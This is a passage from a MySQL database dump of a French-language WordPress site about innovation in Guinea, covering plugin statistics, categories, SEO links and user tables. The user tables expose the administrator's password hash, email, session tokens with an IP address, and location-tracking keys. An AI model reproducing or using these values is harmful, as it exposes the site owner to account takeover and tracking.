13:07:10'),(667,100,8,0,0,'2017-11-21 13:07:11'),(668,100,1,0,1,'2017-11-21 13:16:07'),(669,100,8,0,0,'2017-11-21 13:16:14'),(670,100,1,0,1,'2017-11-21 13:40:43'),(671,100,1,0,1,'2017-11-21 14:10:08'),(672,100,8,0,0,'2017-11-21 14:10:09'),(673,100,1,0,1,'2017-11-21 14:25:31'),(674,100,8,0,0,'2017-11-21 14:25:37'),(675,100,1,0,1,'2017-11-21 15:00:39'),(676,100,1,0,1,'2017-11-21 16:35:13'),(677,100,8,0,0,'2017-11-21 16:35:21'),(678,100,1,0,1,'2017-11-21 19:27:31'),(679,100,8,0,0,'2017-11-21 19:27:38'),(680,100,1,0,1,'2017-11-21 19:52:05'),(681,100,8,0,0,'2017-11-21 19:52:17'),(682,100,8,0,0,'2017-11-21 22:43:14'),(683,100,1,0,1,'2017-11-21 22:43:14'),(684,100,1,0,1,'2017-11-22 02:47:04'),(685,100,1,0,1,'2017-11-22 04:21:32'),(686,100,8,0,0,'2017-11-22 04:21:34'),(687,100,1,0,1,'2017-11-22 10:54:43'),(688,100,8,0,0,'2017-11-22 10:54:45'),(689,100,1,0,1,'2017-11-22 11:04:58'),(690,100,8,0,0,'2017-11-22 11:05:14'),(691,100,1,0,1,'2017-11-22 11:13:22'),(692,100,8,0,0,'2017-11-22 11:13:32'),(693,100,1,0,1,'2017-11-22 11:24:52'),(694,100,8,0,0,'2017-11-22 11:25:03'),(695,100,1,0,1,'2017-11-22 12:01:09'),(696,100,8,0,0,'2017-11-22 12:01:10'),(697,100,1,0,1,'2017-11-22 12:30:03'),(698,100,8,0,0,'2017-11-22 12:30:04'),(699,100,1,0,1,'2017-11-22 12:39:21'),(700,100,8,0,0,'2017-11-22 12:39:28'),(701,100,1,0,1,'2017-11-22 13:02:10'),(702,100,8,0,0,'2017-11-22 13:02:37'),(703,100,1,0,1,'2017-11-22 14:09:14'),(704,100,8,0,0,'2017-11-22 14:09:21'),(705,100,1,0,1,'2017-11-22 17:51:57'),(706,100,8,0,0,'2017-11-22 17:53:24'),(707,100,1,0,1,'2017-11-22 18:58:53'),(708,100,8,0,0,'2017-11-22 18:58:56'),(709,100,1,0,1,'2017-11-22 19:04:28'),(710,100,8,0,0,'2017-11-22 19:04:33'),(711,100,1,0,1,'2017-11-22 19:26:03'),(712,100,8,0,0,'2017-11-22 19:26:10'),(713,100,1,0,1,'2017-11-22 19:32:25'),(714,100,8,0,0,'2017-11-22 19:32:26'),(715,100,1,0,1,'2017-11-22 20:05:27'),(716,100,8,0,0,'2017-11-22 20:06:01'),(717,100,1,0,1,'2017-11-22 21:01:02'),(718,100,8,0,0,'2017-11-22 21:01:45'),(719,100,1,0,1,'2017-11-22 21:18:21'),(720,100,1,0,1,'2017-11-22 22:26:42'),(721,100,1,0,1,'2017-11-22 23:39:20'),(722,100,8,0,0,'2017-11-22 23:39:35'),(723,100,1,0,1,'2017-11-23 01:54:38'),(724,100,8,0,0,'2017-11-23 01:54:39'),(725,100,1,0,1,'2017-11-23 06:16:58'),(726,100,8,0,0,'2017-11-23 06:17:03'),(727,100,1,0,1,'2017-11-23 07:43:43'),(728,100,1,0,1,'2017-11-23 08:30:41'),(729,100,8,0,0,'2017-11-23 08:30:42'),(730,100,1,0,1,'2017-11-23 09:31:28'),(731,100,1,0,1,'2017-11-23 10:12:33'),(732,100,8,0,0,'2017-11-23 10:12:33'),(733,100,1,0,1,'2017-11-23 10:39:07'),(734,100,8,0,0,'2017-11-23 10:39:08'),(735,100,1,0,1,'2017-11-23 11:00:33'),(736,100,8,0,0,'2017-11-23 11:01:44'),(737,100,1,0,1,'2017-11-23 11:15:55'),(738,100,8,0,0,'2017-11-23 11:16:22'),(739,100,1,0,1,'2017-11-23 11:29:24'),(740,100,8,0,0,'2017-11-23 11:29:25'),(741,100,1,0,1,'2017-11-23 11:49:44'),(742,100,1,0,1,'2017-11-23 14:41:14'),(743,100,8,0,0,'2017-11-23 14:41:24');
/*!40000 ALTER TABLE `wpfy_pps_statistics` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_pps_subscribers`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_pps_subscribers` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(128) DEFAULT NULL,
  `email` varchar(128) NOT NULL,
  `hash` varchar(128) NOT NULL,
  `activated` tinyint(1) NOT NULL DEFAULT '0',
  `popup_id` int(11) NOT NULL DEFAULT '0',
  `date_created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `all_data` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_pps_subscribers`
--

LOCK TABLES `wpfy_pps_subscribers` WRITE;
/*!40000 ALTER TABLE `wpfy_pps_subscribers` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfy_pps_subscribers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_pps_usage_stat`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_pps_usage_stat` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `code` varchar(64) NOT NULL,
  `visits` int(11) NOT NULL DEFAULT '0',
  `spent_time` int(11) NOT NULL DEFAULT '0',
  `modify_timestamp` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`),
  UNIQUE KEY `code` (`code`)
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_pps_usage_stat`
--

LOCK TABLES `wpfy_pps_usage_stat` WRITE;
/*!40000 ALTER TABLE `wpfy_pps_usage_stat` DISABLE KEYS */;
INSERT INTO `wpfy_pps_usage_stat` VALUES (5,'check_other_plugs_msg.show',1,0,'2017-11-09 10:36:27'),(6,'enb_promo_link_msg.show',1,0,'2017-11-23 15:45:56'),(7,'enb_stats_msg.show',1,0,'2017-11-23 15:45:56');
/*!40000 ALTER TABLE `wpfy_pps_usage_stat` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_term_relationships`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_order` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_term_relationships`
--

LOCK TABLES `wpfy_term_relationships` WRITE;
/*!40000 ALTER TABLE `wpfy_term_relationships` DISABLE KEYS */;
INSERT INTO `wpfy_term_relationships` VALUES (357,11,0),(361,11,0),(362,11,0),(388,13,0),(389,13,0),(390,13,0),(391,13,0),(392,13,0),(393,13,0),(405,3,0),(411,3,0),(416,1,0),(536,13,0),(543,13,0),(558,13,0),(590,17,0),(603,4,0),(603,8,0),(607,13,0),(613,3,0),(619,3,0),(619,17,0),(626,3,0),(632,2,0),(638,2,0),(638,4,0),(662,3,0),(662,5,0),(670,3,0),(678,17,0),(681,6,0),(835,17,0),(839,3,0),(843,2,0),(846,3,0),(880,3,0),(880,17,0),(897,1,0),(909,2,0),(921,1,0),(930,4,0),(930,17,0);
/*!40000 ALTER TABLE `wpfy_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_term_taxonomy`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `taxonomy` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=18 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_term_taxonomy`
--

LOCK TABLES `wpfy_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wpfy_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wpfy_term_taxonomy` VALUES (1,1,'category','',0,3),(2,2,'category','',0,4),(3,3,'category','',0,9),(4,4,'category','',0,3),(5,5,'category','',0,1),(6,6,'category','',0,1),(8,8,'category','',0,1),(11,11,'elementor_library_type','',0,3),(12,12,'nav_menu','',0,0),(13,13,'nav_menu','',0,10),(14,14,'post_format','',0,0),(15,15,'post_format','',0,0),(16,16,'post_format','',0,0),(17,17,'category','',0,5);
/*!40000 ALTER TABLE `wpfy_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_termmeta`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_termmeta`
--

LOCK TABLES `wpfy_termmeta` WRITE;
/*!40000 ALTER TABLE `wpfy_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfy_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_terms`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `slug` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT '0',
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=18 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_terms`
--

LOCK TABLES `wpfy_terms` WRITE;
/*!40000 ALTER TABLE `wpfy_terms` DISABLE KEYS */;
INSERT INTO `wpfy_terms` VALUES (1,'Autre','autre',0),(2,'Agriculture','agriculture',0),(3,'Technologie','technologie',0),(4,'Economie','economie',0),(5,'Santé','sante',0),(6,'Culture','culture',0),(8,'Sport','sport',0),(11,'page','page',0),(12,'menu','menu',0),(13,'Menu principal','menu-principal',0),(14,'Gallery','post-format-gallery',0),(15,'Video','video',0),(16,'Video','post-format-video',0),(17,'Société','societe',0);
/*!40000 ALTER TABLE `wpfy_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_ts_locations`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_ts_locations` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `trip_id` int(11) NOT NULL,
  `latitude` double NOT NULL,
  `longitude` double NOT NULL,
  `altitude` double NOT NULL,
  `speed` double NOT NULL,
  `heading` double NOT NULL,
  `updated` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `created` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  `occurred` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment` varchar(255) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `occurred` (`occurred`),
  KEY `trip_id` (`trip_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_ts_locations`
--

LOCK TABLES `wpfy_ts_locations` WRITE;
/*!40000 ALTER TABLE `wpfy_ts_locations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfy_ts_locations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_ts_tracks`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_ts_tracks` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `user_id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `updated` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `created` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  `source` varchar(255) NOT NULL,
  `comment` varchar(255) NOT NULL,
  `distance` int(11) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_ts_tracks`
--

LOCK TABLES `wpfy_ts_tracks` WRITE;
/*!40000 ALTER TABLE `wpfy_ts_tracks` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfy_ts_tracks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_usermeta`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=35 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_usermeta`
--

LOCK TABLES `wpfy_usermeta` WRITE;
/*!40000 ALTER TABLE `wpfy_usermeta` DISABLE KEYS */;
INSERT INTO `wpfy_usermeta` VALUES (1,1,'nickname','fmbangoura7'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'comment_shortcuts','false'),(7,1,'admin_color','fresh'),(8,1,'use_ssl','0'),(9,1,'show_admin_bar_front','true'),(10,1,'locale',''),(11,1,'wpfy_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(12,1,'wpfy_user_level','10'),(13,1,'dismissed_wp_pointers',''),(14,1,'show_welcome_panel','1'),(15,1,'session_tokens','a:4:{s:64:\"1e13ae03d46b6e37947951defbc741e98226f335bdb140698347ab28eab8480b\";a:4:{s:10:\"expiration\";i:1512740605;s:2:\"ip\";s:13:\"41.223.49.245\";s:2:\"ua\";s:125:\"Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 Safari/601.1\";s:5:\"login\";i:1511531005;}s:64:\"7f292f3fcb01c19a6719c2dbf74b4dea081c264b5eb2a5f1c92d15213fc02a27\";a:4:{s:10:\"expiration\";i:1513008259;s:2:\"ip\";s:13:\"41.223.49.245\";s:2:\"ua\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\";s:5:\"login\";i:1511798659;}s:64:\"d7d52a8397e71c4964e5f93899d9e82f27c28341df9c7472ab12b3a2f3a642ca\";a:4:{s:10:\"expiration\";i:1513184285;s:2:\"ip\";s:13:\"41.223.49.245\";s:2:\"ua\";s:120:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:5:\"login\";i:1511974685;}s:64:\"3141c83aaa11dfbb99db4acc24e7b4683c8e29caf77a4445bb528c85c28241d4\";a:4:{s:10:\"expiration\";i:1513869920;s:2:\"ip\";s:13:\"41.223.49.245\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:5:\"login\";i:1512660320;}}'),(16,1,'wpfy_dashboard_quick_press_last_post_id','937'),(17,1,'community-events-location','a:1:{s:2:\"ip\";s:11:\"41.223.49.0\";}'),(18,1,'wpfy_user-settings','libraryContent=browse&editor=tinymce&posts_list_mode=list'),(19,1,'wpfy_user-settings-time','1509987958'),(20,1,'nav_menu_recently_edited','13'),(21,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(22,1,'metaboxhidden_nav-menus','a:1:{i:0;s:12:\"add-post_tag\";}'),(23,1,'wpfy_li_user_loves','a:1:{i:0;s:3:\"395\";}'),(24,1,'closedpostboxes_page','a:0:{}'),(25,1,'metaboxhidden_page','a:5:{i:0;s:10:\"postcustom\";i:1;s:16:\"commentstatusdiv\";i:2;s:11:\"commentsdiv\";i:3;s:7:\"slugdiv\";i:4;s:9:\"authordiv\";}'),(26,1,'wpfy_yoast_notifications','a:2:{i:0;a:2:{s:7:\"message\";s:939:\"Nous avons remarqué que vous utilisez Yoast SEO depuis un certain temps ; nous espérons que vous l’adorez ! Nous serions très heureux si vous pouviez <a href=\"https://yoa.st/rate-yoast-seo?utm_content=5.7.1\">nous attribuer 5 étoiles sur WordPress.org</a> !\n\nSi vous rencontrez des problèmes, <a href=\"https://yoa.st/bugreport?utm_content=5.7.1\">veuillez remplir un rapport de bug</a> et nous ferons notre possible pour vous aider.\n\nAu fait, savez-vous que nous avons aussi une <a href=\'https://yoa.st/premium-notification?utm_content=5.7.1\'>extension Premium</a> ? Elle offre des fonctionnalités avancées, tel qu’un gestionnaire de redirection et la prise en charge des mots-clés multiples. Elle donne également accès à un support personnalisé 24/7.\n\n<a class=\"button\" href=\"https://guineeinnove.nimbasolution.com/wp-admin/?page=wpseo_dashboard&yoast_dismiss=upsell\">Merci de ne plus m’afficher cette notification</a>\";s:7:\"options\";a:8:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:19:\"wpseo-upsell-notice\";s:5:\"nonce\";N;s:8:\"priority\";d:0.8000000000000000444089209850062616169452667236328125;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";}}i:1;a:2:{s:7:\"message\";s:207:\"Ne ratez pas vos erreurs d’exploration : <a href=\"https://guineeinnove.nimbasolution.com/wp-admin/admin.php?page=wpseo_search_console&tab=settings\">connectez-vous avec votre Google Search Console ici</a>.\";s:7:\"options\";a:8:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:17:\"wpseo-dismiss-gsc\";s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";}}}'),(27,1,'manageedit-postcolumnshidden','a:4:{i:0;s:6:\"author\";i:1;s:11:\"wpseo-title\";i:2;s:14:\"wpseo-metadesc\";i:3;s:13:\"wpseo-focuskw\";}'),(28,1,'edit_post_per_page','20'),(29,1,'pps-tour-hst','a:1:{s:6:\"closed\";i:1;}'),(30,1,'ts_infobar_template','{displayname} - {lat},{lon} - {timestamp}'),(31,1,'ts_trackme_key','68f342de'),(32,1,'ts_osmand_key','a4dfb8fa'),(33,1,'ts_sendlocation_key','0ea9816c'),(34,1,'ts_tracks_admin_view','0');
/*!40000 ALTER TABLE `wpfy_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_users`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_pass` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_nicename` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_url` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT '0',
  `display_name` varchar(250) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_users`
--

LOCK TABLES `wpfy_users` WRITE;
/*!40000 ALTER TABLE `wpfy_users` DISABLE KEYS */;
INSERT INTO `wpfy_users` VALUES (1,'fmbangoura7','$P$Bi01TXKk9QAzyFYDh50YKNYayrTnYd.','fmbangoura7','admin@guineeinnove.nimbasolution.com','','2017-10-23 13:48:44','',0,'fmbangoura7');
/*!40000 ALTER TABLE `wpfy_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_yoast_seo_links`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_yoast_seo_links` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `url` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `post_id` bigint(20) unsigned NOT NULL,
  `target_post_id` bigint(20) unsigned NOT NULL,
  `type` varchar(8) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `link_direction` (`post_id`,`type`)
) ENGINE=InnoDB AUTO_INCREMENT=659 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_yoast_seo_links`
--

LOCK TABLES `wpfy_yoast_seo_links` WRITE;
/*!40000 ALTER TABLE `wpfy_yoast_seo_links` DISABLE KEYS */;
INSERT INTO `wpfy_yoast_seo_links` VALUES (7,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte.jpg',416,0,'internal'),(8,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4.jpg',416,0,'internal'),(9,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg',416,0,'internal'),(10,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2.jpg',416,0,'internal'),(11,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6.jpg',416,0,'internal'),(12,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1.jpg',416,0,'internal'),(343,'http://agsp.ovh/',678,0,'external'),(345,'http://entrepreneurclub.orange.com/fr/entrepreneur-social-2017/projet/colismart.html',670,0,'external'),(389,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(390,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(391,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(392,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(393,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(394,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(395,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(396,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(397,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(398,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(399,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(400,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(401,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(402,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(407,'https://play.google.com/store/apps/details?id=com.moudjames23.quiz224',626,0,'external'),(408,'http://www.porcedures-guinee.org/',619,0,'external'),(415,'http://Earthguinee.org',835,0,'external'),(417,'http://www.senditoo.com/',839,0,'external'),(529,'https://www.loniya.org/',613,0,'external'),(530,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/JAMES-PIERRE-Un-nouveau-Einstein-en-Afrique-Un-Guinéen-publie...via-torchbrowser.com_.mp4',897,0,'internal'),(543,'https://www.facebook.com/mamadoubhoye.bah.50',909,0,'external'),(544,'http://earthguinea.org/culture-du-cafe-un-jeune-guineen-se-demarque-dans-larabica-100-bio/',909,0,'external'),(545,'http://earthguinea.org/culture-du-cafe-un-jeune-guineen-se-demarque-dans-larabica-100-bio/',909,0,'external'),(651,'http://www.change-guinea.org/',930,0,'external'),(652,'http://www.budgetouvertgn.org',930,0,'external'),(653,'https://www.facebook.com/ibrahimakalil.gueye',930,0,'external'),(654,'https://www.facebook.com/ablogui/',930,0,'external'),(655,'https://www.facebook.com/AfriyanGuin%C3%A9e-2091165687576353/',930,0,'external'),(656,'https://www.facebook.com/agilinternationale.org/',930,0,'external'),(657,'https://www.facebook.com/La-Voix-Du-Peuple-Guin%C3%A9e-737636573077241/',930,0,'external'),(658,'https://www.facebook.com/groups/207880299670774/',930,0,'external');
/*!40000 ALTER TABLE `wpfy_yoast_seo_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_yoast_seo_meta`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_yoast_seo_meta` (
  `object_id` bigint(20) unsigned NOT NULL,
  `internal_link_count` int(10) unsigned DEFAULT NULL,
  `incoming_link_count` int(10) unsigned DEFAULT NULL,
  UNIQUE KEY `object_id` (`object_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_yoast_seo_meta`
--

LOCK TABLES `wpfy_yoast_seo_meta` WRITE;
/*!40000 ALTER TABLE `wpfy_yoast_seo_meta` DISABLE KEYS */;
INSERT INTO `wpfy_yoast_seo_meta` VALUES (1,0,0),(2,0,0),(8,0,0),(9,0,0),(10,0,0),(11,0,0),(14,0,0),(15,0,0),(16,0,0),(18,0,0),(20,0,0),(21,0,0),(26,0,0),(27,0,0),(29,0,0),(32,0,0),(33,0,0),(38,0,0),(39,0,0),(41,0,0),(44,0,0),(45,0,0),(47,0,0),(50,0,0),(51,0,0),(56,0,0),(58,0,0),(61,0,0),(62,0,0),(67,0,0),(68,0,0),(69,0,0),(70,0,0),(73,0,0),(74,0,0),(76,0,0),(79,0,0),(80,0,0),(85,0,0),(86,0,0),(88,0,0),(91,0,0),(92,0,0),(94,0,0),(97,0,0),(98,0,0),(99,0,0),(100,0,0),(103,0,0),(104,0,0),(106,0,0),(109,0,0),(110,0,0),(112,0,0),(115,0,0),(116,0,0),(118,0,0),(121,0,0),(122,0,0),(125,0,0),(127,0,0),(128,0,0),(130,0,0),(133,0,0),(134,0,0),(139,0,0),(140,0,0),(142,0,0),(145,0,0),(146,0,0),(147,0,0),(148,0,0),(151,0,0),(152,0,0),(157,0,0),(158,0,0),(159,0,0),(160,0,0),(163,0,0),(164,0,0),(166,0,0),(169,0,0),(170,0,0),(175,0,0),(176,0,0),(178,0,0),(181,0,0),(182,0,0),(184,0,0),(187,0,0),(188,0,0),(189,0,0),(190,0,0),(193,0,0),(195,0,0),(198,0,0),(199,0,0),(204,0,0),(205,0,0),(207,0,0),(210,0,0),(211,0,0),(213,0,0),(216,0,0),(217,0,0),(218,0,0),(219,0,0),(222,0,0),(223,0,0),(225,0,0),(228,0,0),(229,0,0),(231,0,0),(234,0,0),(235,0,0),(240,0,0),(241,0,0),(243,0,0),(246,0,0),(247,0,0),(249,0,0),(250,0,0),(252,0,0),(253,0,0),(255,0,0),(256,0,0),(258,0,0),(259,0,0),(266,0,0),(267,0,0),(269,0,0),(272,0,0),(273,0,0),(275,0,0),(278,0,0),(279,0,0),(281,0,0),(284,0,0